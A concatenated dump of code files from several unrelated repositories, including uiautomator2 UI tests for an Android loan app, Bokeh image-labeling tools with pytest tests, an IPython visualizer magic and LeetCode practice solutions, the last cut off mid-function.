d(resourceId="com.xiaoxiao.ludan:id/tv_edit_title",text='备注:').sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(u"测试数据 - %s" % self.NowTime,timeout=2)
d(resourceId="com.xiaoxiao.ludan:id/right").click(timeout=5)
d(text='提交按揭部').click(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title", text=u'报单详情').exists(timeout=5) == True:
log.info(d.toast.get_message(10, 5))
d(scrollable=True).scroll.to(text="最新进度:")
get_loanID = d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"贷款编号:").sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").get_text(timeout=5)
get_loanCount = d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"申请金额:").sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").get_text(timeout=3)
log.info('Loan ID: %s' % get_loanID)
log.info('Loan amount: %s' % get_loanCount)
print('Loan ID: %s' % get_loanID)
print('Loan amount: %s' % get_loanCount)
with open(self.loanID_PATH, 'w') as f:
f.write(get_loanID)
else:
log.error('Server response: %s' % d.toast.get_message(10, 5))
print('Server response: %s' % d.toast.get_message(10, 5))
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title", text=u'报单详情').exists(),msg='Server response: %s' % d.toast.get_message(10, 5))
else:
log.error('Server response: %s' % d.toast.get_message(10, 5))
print('Server response: %s' % d.toast.get_message(10, 5))
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title", text=u'贷款信息').exists(),msg='Server response: %s' % d.toast.get_message(10, 5))
else:
log.error('Server response: %s' % d.toast.get_message(10, 5))
print('Server response: %s' % d.toast.get_message(10, 5))
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title",text='快速报单').exists(),msg='Server response: %s' % d.toast.get_message(10, 5))
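# Run note (assumption, not in the original): this suite drives a real
# device or emulator through uiautomator2, so it needs an adb-connected
# device and network access to the OCR endpoint, e.g.:
#   python test_new_loan.py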
if __name__ == '__main__':
unittest.main()
```
#### File: examples/com.xiaoxiao.ludan/test_temp.py
```python
import time
import unittest
import uiautomator2 as u2
import uiautomator2.ext.ocr as ocr
import random
from utx import *
class TestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.d = u2.connect()
cls.d.set_orientation('natural')
cls.d.healthcheck()
cls.d.implicitly_wait(10)
cls.d.app_clear("com.xiaoxiao.ludan")
cls.d.app_stop_all()
ocr.API = "http://ocr.open.netease.com/api/ocr"
u2.plugin_register("ocr", ocr.OCR)
def setUp(self):
self.d.set_fastinput_ime(True)
self.sess = self.d.session("com.xiaoxiao.ludan")
def tearDown(self):
self.d.app_clear("com.xiaoxiao.ludan")
self.d.app_stop_all()
# def test_000(self):
# self.d.ext_ocr.all()
# self.d.ext_ocr("登录").click()
# print('OCR')
# output
# ('状态', 138, 1888),
# ('运动', 408, 1888),
# ('发现', 678, 1888),
# ('我的', 948, 1888)]
# d.ext_ocr("我的").click() # 点击带有"我的" 的按钮
# @tag(Tag.temp)
# def test_idcard_generator(self):
# """ 随机生成新的18为身份证号码 """
# ARR = (7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2)
# LAST = ('1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2')
# t = time.localtime()[0]
# x = '%02d%02d%02d%04d%02d%02d%03d' % (
# random.randint(10, 99), random.randint(1, 99), random.randint(1, 99), random.randint(t - 80, t - 18),
# random.randint(1, 12), random.randint(1, 28), random.randint(1, 999))
# y = 0
# for i in range(17):
# y += int(x[i]) * ARR[i]
# IDCard = '%s%s' % (x, LAST[y % 11])
# # birthday = '%s-%s-%s 00:00:00' % (IDCard[6:14][0:4], IDCard[6:14][4: 6], IDCard[6:14][6:8])
# print(IDCard)
# log.info(IDCard)
# return IDCard
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1004parky/sceptovideo",
"score": 2
} |
#### File: sceptovideo/behavioral_analysis/traintools.py
```python
import numpy as np
from functools import partial
from bokeh.layouts import column, row, layout
from bokeh.models import ColumnDataSource, Slider, Button
from bokeh.themes import Theme
from bokeh.io import show
from bokeh.plotting import figure, output_file, Column
from bokeh.models import DataTable, TableColumn, PointDrawTool, ColumnDataSource, CrosshairTool, CDSView, BooleanFilter
from bokeh.events import DoubleTap
from bokeh.models.widgets import TextInput
from bokeh.palettes import viridis
import segmentation
import bootcamp_utils
def _check_ims(ims):
if not segmentation._check_array_like(ims):
raise RuntimeError("The given ims object is not array like, it is " + str(type(ims)))
[segmentation._check_image_input(im) for im in ims]
def point_label(ims, point_size=3, table_height=200, crosshair_tool_alpha=0.5,
point_tool_color='white'):
_check_ims(ims)
ims = np.array(ims)
max_height = max(np.array([b.shape for b in ims])[:, 0])
max_width = max(np.array([b.shape for b in ims])[:, 1])
point_labels = ColumnDataSource({'x': [], 'y': [], 'frame': []})
def modify_doc(doc):
im_num = [0,]
images = [np.pad(im, ((max_height-im.shape[0], 0), (0, max_width-im.shape[1])), 'constant') for im in ims]
plot, source = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]], return_im=True)
source = source.data_source
booleans = [frame == im_num[-1] for frame in point_labels.data['frame']]
view = CDSView(source=point_labels, filters=[BooleanFilter(booleans)])
renderer = plot.scatter(x='x', y='y', source=point_labels, view=view,
color=point_tool_color, size=point_size)
columns = [TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field='frame', title='frame')]
table = DataTable(source=point_labels, columns=columns, editable=True, height=table_height)
draw_tool = PointDrawTool(renderers=[renderer], empty_value=im_num[-1])
plot.add_tools(draw_tool)
plot.add_tools(CrosshairTool(line_alpha=crosshair_tool_alpha))
plot.toolbar.active_tap = draw_tool
def update_image(new_ind):
_, data = bootcamp_utils.viz.bokeh_imshow(images[new_ind], return_im=True)
data = data.data_source
source.data = data.data
def callback_point_view(event):
booleans = [frame == im_num[-1] for frame in point_labels.data['frame']]
view = CDSView(source=point_labels, filters=[BooleanFilter(booleans)])
renderer.view = view
def callback_slider(attr, old, new):
update_image(new)
im_num.append(int(new))
draw_tool.empty_value = im_num[-1]
callback_point_view('tap')
def callback_button(direction):
new = im_num[-1]+direction
if (((len(images) - 1) < new and direction == 1) or
(new == -1 and direction == -1)):
return None
update_image(new)
im_num.append(new)
draw_tool.empty_value = im_num[-1]
callback_point_view('tap')
slider = Slider(start=0, end=len(images) - 1, value=0, step=1, title="Frame Number")
slider.on_change('value', callback_slider)
button_back = Button(label='back',button_type="success")
button_back.on_click(partial(callback_button, direction=-1))
button_forward = Button(label='forward',button_type="success")
button_forward.on_click(partial(callback_button, direction=1))
plot.on_event('tap', callback_point_view)
doc.add_root(column(row(slider), plot, row(button_back, button_forward), table))
show(modify_doc)
return point_labels
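# Usage sketch (hypothetical frame list; requires a live Bokeh server
# context, e.g. a Jupyter notebook with bokeh.io.output_notebook()):
#
#   import skimage.io
#   frames = [skimage.io.imread('frame_%d.tif' % i) for i in range(3)]
#   labels = point_label(frames)   # click to place points on each frame
#   labels.to_df()                 # ColumnDataSource -> pandas DataFrame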
def button_label(ims, button_values=('beetle', 'ant')):
_check_ims(ims)
ims = np.array(ims)
max_height = max(np.array([b.shape for b in ims])[:, 0])
max_width = max(np.array([b.shape for b in ims])[:, 1])
frame_labels = ColumnDataSource({'type': [],
'frame': []})
def modify_doc(doc):
im_num = [0,]
images = [np.pad(im, ((max_height-im.shape[0],0), (0, max_width-im.shape[1])), 'constant') for im in ims]
plot, source = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]], return_im=True)
source = source.data_source
columns = [TableColumn(field='type', title='type'),
TableColumn(field='frame', title='frame')]
table = DataTable(source=frame_labels, columns=columns, editable=True, height=200)
plot.add_tools(CrosshairTool(line_alpha=0.5))
def callback(attr, old, new):
im_num.append(int(new))
temp_plot, data = bootcamp_utils.viz.bokeh_imshow(images[int(new)], return_im=True)
data = data.data_source
source.data = data.data
plot.x_range.end = temp_plot.x_range.end
#plot.plot_width = temp_plot.plot_width
#layout.children[1] = plot
def callback_button(direction):
if (((len(images) - 2) < im_num[-1] and direction == 1) or
(im_num[-1] == 0 and direction == -1)):
return None
_, data = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]+direction], return_im=True)
im_num.append(im_num[-1]+direction)
data = data.data_source
source.data = data.data
def callback_label_button(value):
new_data = {'type': [value],
'frame': [im_num[-1]]}
frame_labels.stream(new_data)
if (len(images) - 2) < im_num[-1]:
return None
_, data = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]+1], return_im=True)
im_num.append(im_num[-1]+1)
data = data.data_source
source.data = data.data
slider = Slider(start=0, end=len(images)-1, value=0, step=1, title="Frame Number")
slider.on_change('value', callback)
button_back = Button(label='back',button_type="success")
button_back.on_click(partial(callback_button, direction=-1))
button_forward = Button(label='forward',button_type="success")
button_forward.on_click(partial(callback_button, direction=1))
label_buttons = [Button(label=value, button_type='success') for value in button_values]
[button.on_click(partial(callback_label_button, value=value)) for button, value in zip(label_buttons, button_values)]
        # for a grid layout of the buttons, we need to pad the list with an empty spot if the button count is not even
if not np.isclose(len(label_buttons) % 2, 0):
label_buttons.append(Button(label=''))
buttons = np.reshape(label_buttons, (-1,2))
buttons = buttons.tolist()
layout_list = [[slider], [plot],
[button_back, button_forward]]
[layout_list.append(button) for button in buttons]
layout_list.append([table])
doc.add_root(layout(layout_list))
show(modify_doc)
return frame_labels
```
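These Bokeh labeling helpers are meant to run inside a Jupyter notebook with notebook output enabled. A minimal sketch of driving `button_label` is below; the frames and button values are hypothetical stand-ins.
```python
# Hypothetical usage sketch: assumes a Jupyter notebook and that the helpers
# above are importable from this module.
import numpy as np
from bokeh.io import output_notebook

output_notebook()  # route Bokeh output into the notebook

ims = np.random.rand(3, 64, 64)  # three fake 64x64 frames standing in for video

# returns a ColumnDataSource that accumulates (type, frame) rows as you click
frame_labels = button_label(ims, button_values=('beetle', 'ant'))
```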
#### File: sceptovideo/tests/test_segmentation_pipeline.py
```python
import numpy as np
import sys
sys.path.append("../behavioral_analysis")
import segmentation
import pytest
import skimage.filters
from hypothesis import given
import hypothesis.strategies
import hypothesis.extra.numpy
# test functions for simple segmentation based tracking code
def test_im_shape():
im = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_image_input(im)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_im_data_type_list():
im = [[1, 2, 3], [1, 2, 3]]
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_image_input(im)
excinfo.match("Need to provide a numpy array, image has type <class 'list'>")
def test_im_data_type_string():
im = '[[1, 2, 3], [1, 2, 3]]'
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_image_input(im)
excinfo.match("Need to provide a numpy array, image has type <class 'str'>")
def test_im_shape_segment():
im = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_im_data_type_list_segment():
im = [[1, 2, 3], [1, 2, 3]]
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Need to provide a numpy array, image has type <class 'list'>")
def test_im_data_type_string_segment():
im = '[[1, 2, 3], [1, 2, 3]]'
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Need to provide a numpy array, image has type <class 'str'>")
def test_provided_function_callable():
im = np.array([[1, 2, 3], [1, 2, 3]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im, thresh_func='Hello, world.')
excinfo.match("The provided function is not callable")
def test_provided_function_callable_mat():
im = np.array([[1, 2, 3], [1, 2, 3]])
args = (3,)
assert segmentation._check_function_input(im, skimage.filters.threshold_local, args) == True
def test_provided_function_returns_correct_shape():
im = np.array([[1, 2, 3], [1, 2, 3]])
def bad_func(im):
return(np.array([[1, 2], [1, 2]]))
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im, thresh_func=bad_func)
excinfo.match("Array output of the function must have same shape as the image \
the output array has shape \(2, 2\), image has shape \(2, 3\)")
def test_provided_function_returns_correct_types():
im = np.array([[1, 2, 3], [1, 2, 3]])
def bad_func(im):
return('Hello, world!')
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im, thresh_func=bad_func)
excinfo.match("The provided function must output a numeric or array \
provided function returns type <class 'str'>")
def test_check_numeric_function():
assert segmentation._check_numeric_types(np.int32(1)) == True
def test_bg_subtract_im_type():
im1 = np.array([[1, 2, 3], [1, 2, 3]])
im2 = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.bg_subtract(im1, im2)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_bg_subtract_im_dims():
im1 = np.array([[1, 2, 3], [1, 2, 3]])
im2 = np.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.bg_subtract(im1, im2)
excinfo.match("The provided images have different dimension \
im1: \(2, 3\), im2: \(3, 3\)")
def test_im_normalization_range():
im = np.array([[1, 2, 3], [1, 2, 3]])
new_im = segmentation.normalize_convert_im(im)
assert new_im.max() == 1
assert new_im.min() == 0
@given(hypothesis.extra.numpy.arrays(dtype=int, shape=(50,50)))
def test_im_normalization_range_int(im):
if np.isclose(im.max(), 0) and np.isclose(im.min(), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image is near to zero for all values")
elif np.isclose((im.max() - im.min()), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image has nearly the same value for all pixels. Check input")
else:
new_im = segmentation.normalize_convert_im(im)
assert new_im.max() == 1
assert new_im.min() == 0
@given(hypothesis.extra.numpy.arrays(dtype=float, shape=(50,50)))
def test_im_normalization_range_float(im):
if np.isclose(im.max(), 0) and np.isclose(im.min(), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image is near to zero for all values")
elif np.any(np.isnan(im)):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Data contains a nan, decide how to handle missing data")
elif np.any(np.isinf(im)):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Data contains an np.inf, decide how to handle infinite values")
elif np.isclose((im.max() - im.min()), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image has nearly the same value for all pixels. Check input")
else:
new_im = segmentation.normalize_convert_im(im)
assert new_im.max() == 1
assert new_im.min() == 0
@given(hypothesis.extra.numpy.arrays(dtype=np.float128, shape=(50,50)))
def test_im_normalization_range_float128(im):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Provided image has unsuported type: float128")
def test_im_near_zero():
im = np.array([[0, 0, 0], [0, 0, 0]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Inputed image is near to zero for all values")
def test_im_has_nan():
im = np.array([[np.nan, 0, 0], [0, 0, 0]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Data contains a nan, decide how to handle missing data")
def test_im_has_inf():
im = np.array([[np.inf, 0, 0], [0, 0, 0]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Data contains an np.inf, decide how to handle infinite values")
def test_int_types():
assert segmentation._check_int_types(1.0) == False
assert segmentation._check_int_types(1) == True
assert segmentation._check_int_types(np.int32(1)) == True
assert segmentation._check_int_types(np.uint64(1)) == True
@given(hypothesis.extra.numpy.arrays(dtype=np.float128, shape=(10,10)))
def test_numpy_array_int_types(ar):
    assert segmentation._check_numpy_array_int_types(ar) == False
@given(hypothesis.strategies.tuples(hypothesis.strategies.integers(), hypothesis.strategies.integers()))
def test_array_like_tuple(tu):
    assert segmentation._check_array_like(tu) == True
@given(hypothesis.strategies.lists(hypothesis.strategies.integers()))
def test_array_like_list(li):
    assert segmentation._check_array_like(li) == True
@given(hypothesis.extra.numpy.arrays(dtype=np.float128, shape=(10,10)))
def test_array_like_nparray(ar):
    assert segmentation._check_array_like(ar) == True
def test_numpy_array_string_types():
    assert segmentation._check_numpy_array_string_types(np.array(['rectangle', 'ellipse'])) == True
def test_check_roi_inputs():
roi_kind = ['ellipse', 'rectangle']
cent = [1, 2]
width = [1, 2]
height = [1, 2]
outside_roi = 'max'
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs('hello', cent, width, height, outside_roi)
excinfo.match("The given roi kind object is not array like, it is " + str(type('hello')))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, 1, width, height, outside_roi)
excinfo.match("The given roi centers object object is not array like, it is " + str(type(1)))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, 5.0, height, outside_roi)
excinfo.match("The given width object object is not array like, it is " + str(type(5.0)))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, width, '[1.0, 1.2]', outside_roi)
excinfo.match("The given height object object is not array like, it is " + str(type('[1.0, 1.2]')))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, [1.0, 1.2], width, height, outside_roi)
excinfo.match("The cent object must have entries of integer type")
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, ['1', 2], height, outside_roi)
excinfo.match("The width object must have entries of integer type")
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, width, [(1, 2), 2], outside_roi)
excinfo.match("The height object must have entries of integer type")
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs([1, 2], cent, width, height, outside_roi)
excinfo.match("The roi_kind object must have entries of type str")
def test_check_crop_inputs():
cent = [1, 2]
width = 20
height = 10
cent = 0
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The given cent object is not array like, it is " + str(type(cent)))
cent = [1, 2.0]
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The cent object must have entries of integer type")
cent = [1, 2]
width = 2.0
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The width must be integer type")
width = 20
height = 2.0
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The height must be integer type")
def test_bg_image_maker_string_err():
im = np.array([[0,1], [0,1]])
ims = 'im, im, im'
with pytest.raises(RuntimeError) as excinfo:
segmentation.construct_bg_img(ims)
excinfo.match('Provided ims object is not array like, it is type <class \'str\'>')
def test_bg_image_maker_im_err():
im = np.array(['[0,1]', '[0,1]', '[0,1]'])
ims = [im, im, im]
with pytest.raises(RuntimeError) as excinfo:
segmentation.construct_bg_img(ims)
excinfo.match('Need to provide an array with shape \(n, m\). Provided array has shape \(3,\)')
def test_bg_image_maker_num_ims_err():
im = np.array([[0,1], [0,1]])
ims = [im, im, im]
with pytest.raises(RuntimeError) as excinfo:
segmentation.construct_bg_img(ims, num_ims=10.0)
excinfo.match('Please provide an integer for the num_ims parameter. Provided argument has type ' + str(type(10.0)))
```
#### File: sceptovideo/tests/test_traintools.py
```python
import numpy as np
import sys
sys.path.append("../behavioral_analysis")
import traintools
import pytest
from hypothesis import given
import hypothesis.strategies
import hypothesis.extra.numpy
def test_im_shape():
im = np.array([
[[[1, 2], [1, 2]], [[1, 2], [1, 2]]],
[[[1, 2], [1, 2]], [[1, 2], [1, 2]]]
])
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(im)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_ims_shape():
ims = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
traintools._check_ims(ims)
def test_ims_data_type_list():
ims = [[[1, 2], [1, 2]], [[1, 2], [1, 2]]]
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(ims)
excinfo.match("Need to provide a numpy array, image has type <class 'list'>")
def test_ims_data_type_contrains_string():
ims = np.array([[['1', 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(ims)
excinfo.match("Provided image has unsuported type: <U1")
def test_im_data_type_string():
im = '[[[1, 2], [1, 2]], [[1, 2], [1, 2]]]'
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(im)
excinfo.match("The given ims object is not array like, it is <class 'str'>")
``` |
{
"source": "10051556/mytutor",
"score": 3
} |
#### File: mytutor/testmytutor/__init__.py
```python
from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic,
line_cell_magic)
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
from IPython.display import IFrame, display
from urllib.parse import quote
@magics_class
class TestMyTutor(Magics):
@magic_arguments()
@argument('-w',
'--width',
type=int,
default=1100,
help="The width of the output frame (default: 1100).")
@argument('-r', '--run', action='store_true', help="Run cell in IPython.")
@argument('-h',
'--height',
type=int,
default=700,
help="The height of the output frame (default: 700).")
@argument('-lang',
'--language',
type=str,
default='3',
help="The language of the output (default: python3). \n2 = python2 \n3 = python3 \npyanaconda = Anaconda\njava = java")
# @cell_magic
# def mytutor(self, line, cell):
# opts = parse_argstring(self.mytutor, line)
# if opts.run:
# result = self.shell.run_cell(cell)
# url = "https://e-quiz.cs.cityu.edu.hk/opt/cs1302visualize.html#mode=display&code="+quote(cell, safe='')
# display(IFrame(url, width=opts.width, height=opts.height))
@cell_magic
def testmytutor(self, line, cell):
opts = parse_argstring(self.testmytutor, line)
if opts.run:
result = self.shell.run_cell(cell)
url = "https://mytutor.cs.cityu.edu.hk/opt2/cs1302visualize.html#mode=display&py=" + opts.language + "&code=" + quote(cell, safe='')
display(IFrame(url, width=opts.width, height=opts.height))
def load_ipython_extension(ipython):
"""
Register the magics with a running IPython so the magics can be loaded via
`%load_ext testmytutor` or be configured to be autoloaded by IPython at startup time.
"""
ipython.register_magics(TestMyTutor)
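# Illustrative notebook usage (an assumption, not taken from this repo):
#
#   In [1]: %load_ext testmytutor
#
#   In [2]: %%testmytutor -r --height 500
#      ...: x = [1, 2, 3]
#      ...: print(sum(x))
#
# The -r flag runs the cell locally before the visualizer IFrame is embedded.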
``` |
{
"source": "1005281342/learn",
"score": 3
} |
#### File: learn/leetcode/1005.py
```python
class Solution:
def largestSumAfterKNegations(self, A: list, K: int) -> int:
        # partition A into positives (M), negatives (m), and zero (aa)
M = []
m = []
aa = None
for a in A:
if a > 0:
M.append(a)
elif a < 0:
m.append(a)
else:
aa = a
S_M = sum(M)
lm = len(m)
if M:
M.sort()
# lM = len(M)
if m:
m.sort()
if K <= lm:
return S_M - sum(m[:K]) + sum(m[K:])
elif K > lm:
if aa is None and (K - lm) % 2:
return S_M - sum(m) - 2*min(M+[-x for x in m])
else:
return S_M - sum(m)
if aa is None and (K-lm) % 2:
return sum(M[1:]) - M[0]
else:
return S_M
```
#### File: learn/leetcode/1007.py
```python
class Solution:
def res(self, a, b):
count = 0
for i in range(1, len(a)):
if a[i] != a[0] and b[i] != a[0]:
return -1
elif a[i] != a[0]:
a[i] = b[i]
count += 1
return count
def minDominoRotations(self, A: list, B: list) -> int:
return max(self.res(A[:], B[:]), self.res(B[:], A[:]))
S = Solution()
print(S.minDominoRotations([1,2,1,1,1,2,2,2],[2,1,2,2,2,2,2,2]))
```
#### File: learn/leetcode/1014.py
```python
class Solution:
def shipWithinDays(self, weights: list, D: int) -> int:
w_all = sum(weights)
a = w_all // D
print(a)
res = [0] * D
c = 0
i = 0
for w in weights:
if w >= a:
res[i] = w
i += 1
else:
c += w
if c >= a:
res[i] = c
i += 1
c = 0
else:
res[i] = c
s = sorted(res)
print(s)
c_0 = s.count(0)
if not s[-1 - c_0]:
return max(weights[:]+[s[-1]])
return max([s[-1 - c_0]]+weights[:])
S = Solution()
res = S.shipWithinDays(weights=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 2], D=5)
print(res)
```
#### File: learn/leetcode/1023.py
```python
class Solution:
def queryString(self, S: str, N: int) -> bool:
for x in range(N, -1, -1):
# print(x)
# print(bin(x)[2:])
if bin(x)[2:] not in S:
return False
return True
S = Solution()
s = S.queryString(S="0110", N=4)
print(s)
```
#### File: learn/leetcode/12.py
```python
class Solution:
    def intToRoman(self, num: int) -> str:
        # greedy: repeatedly subtract the largest symbol value that still fits
        values = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
                  (100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
                  (10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
        out = []
        for value, symbol in values:
            while num >= value:
                out.append(symbol)
                num -= value
        return ''.join(out)
```
#### File: learn/leetcode/14.py
```python
class Solution:
def longestCommonPrefix(self, strs: list) -> str:
if not strs:
return ''
strs.sort(key=len)
# print(strs)
l = len(strs[0])
# status = False
# while l > 0 and not status:
while l > 0:
start = strs[0][:l]
# print(start)
count = 1
for string in strs[1:]:
if start != string[:l]:
l -= 1
break
count += 1
if count == len(strs):
# status = False
return start
return ''
if __name__ == '__main__':
S = Solution()
res = S.longestCommonPrefix(["dog","racecar","car"])
print(res)
```
#### File: learn/leetcode/16.py
```python
class Solution:
# def b_min(self, a, b):
# if abs(a) > abs(b):
# return b
# return a
def b_min(self, a, b):
if abs(a) > abs(b):
return b
return a
def threeSumClosestP(self, nums: list, target: int):
# nums.sort()
m_l = len(nums)
s = 1 << 32
for i in range(m_l-2):
for j in range(i+1, m_l-1):
for k in range(j+1, m_l):
s = self.b_min(s, nums[i]+nums[j]+nums[k]-target)
# print(s)
return s + target
def threeSumClosest(self, num: list, target: int):
num.sort()
m_l = len(num)
if m_l <= 3:
return sum(num)
if m_l <= 140:
return self.threeSumClosestP(num, target)
res_d = dict()
        # initialize the running best with a large sentinel value
s = 1 << 32
for i in range(m_l - 2):
if i == 0 or num[i] > num[i - 1]:
left = i + 1
right = m_l - 1
                # exact hit: the sum equals the target
if num[i] + num[left] + num[right] == target:
return num[i] + num[left] + num[right]
                # the sum is below the target
elif num[i] + num[left] + num[right] < target:
while left < right:
# s = self.b_min(s, num[i] + num[left] + num[right] - target)
p = abs(num[i] + num[left] + num[right] - target)
if p < s:
s = p
res_d[p] = num[i] + num[left] + num[right]
left += 1
# print(s)
# if num[left] > num[left - 1]:
# break
                # the sum is above the target
else:
while left < right:
# s = self.b_min(s, num[i] + num[left] + num[right] - target)
p = abs(num[i] + num[left] + num[right] - target)
if p < s:
s = p
res_d[p] = num[i] + num[left] + num[right]
right -= 1
# if num[right] < num[right + 1]:
# break
return res_d[min(res_d.keys())]
# class Solution:
#
# def b_min(self, a, b):
# if abs(a) > abs(b):
# return b
# return a
#
# def threeSumClosest(self, nums: list, target: int):
# # nums.sort()
# m_l = len(nums)
# s = 1 << 32
# for i in range(m_l-2):
# for j in range(i+1, m_l-1):
# for k in range(j+1, m_l):
# s = self.b_min(s, nums[i]+nums[j]+nums[k]-target)
# # print(s)
#
# return s + target
S = Solution()
# print(S.threeSumClosest([0, 2, 1, -3], 1)) # 0
print(S.threeSumClosest([-1, 2, 1, -4], 1)) # 2
# print(S.threeSumClosest([1,2,4,8,16,32,64,128], 82)) # 82
print(S.threeSumClosest([56,57,-47,-14,23,31,20,39,-51,7,-4,43,-53,32,24,56,-28,90,-75,-6,21,-100,41,-84,95,95,44,84,70,-22,-86,-6,90,-87,65,-28,-29,-94,98,-28,-100,23,-25,6,-56,-54,-5,53,-88,-25,-31,-71,-13,-62,73,-35,-78,16,99,97,84,-27,-43,-50,18,-16,-61,7,-17,16,-92,28,43,-38,-33,-27,84,-72,-100,-91,-97,-99,59,-63,73,99,98,-100,-37,-80,3,18,93,-81,12,-75,-43,99,10,10,-6,13,0,76,-82,-5,27,-38,-81,77,-55,-100,90,-32,-25,-15,-16,68,-6,87,65,-38,82,78,-61,87,-72,46,50,-60,86,39,69,85,-49,28], -289)) # 82
```
#### File: learn/leetcode/17.py
```python
from itertools import product
class Solution:
def letterCombinations(self, digits: str) -> list:
        # map each digit to its list of letters
dic = {2: ['a', 'b', 'c'],
3: ['d', 'e', 'f'],
4: ['g', 'h', 'i'],
5: ['j', 'k', 'l'],
6: ['m', 'n', 'o'],
7: ['p', 'q', 'r', 's'],
8: ['t', 'u', 'v'],
9: ['w', 'x', 'y', 'z'],
}
        # list that collects the combinations
ret_str = []
if len(digits) == 0:
return []
        # base case: with a single digit left, return its letters directly
if len(digits) == 1:
return dic[int(digits[0])]
        # recurse, consuming one digit per call
result = self.letterCombinations(digits[1:])
        # result is a list of strings; prepend each letter of the current digit
for r in result:
for j in dic[int(digits[0])]:
ret_str.append(j + r)
return ret_str
# if len(digits) == 1:
# return list(d[digits])
#
# x = ['']
# for char in digits:
# if char in {'7', '9'}:
# x *= 4
# else:
# x *= 3
# # print(x)
# # l_x = len(x)
# for v in digits:
# l_v = len(d[v])
# # print(l_v)
# for i in range(l_v):
# for ii, j in enumerate(d[v]):
# # print(j)
# x[i * l_v + ii] += j
# for bb in product(x):
# print(bb)
# return x
S = Solution()
print(S.letterCombinations("23"))
```
#### File: learn/leetcode/19.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def get_length(self, head: ListNode):
c = 0
pre = head
while pre.next is not None:
c += 1
pre = pre.next
return c
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
c = self.get_length(head)
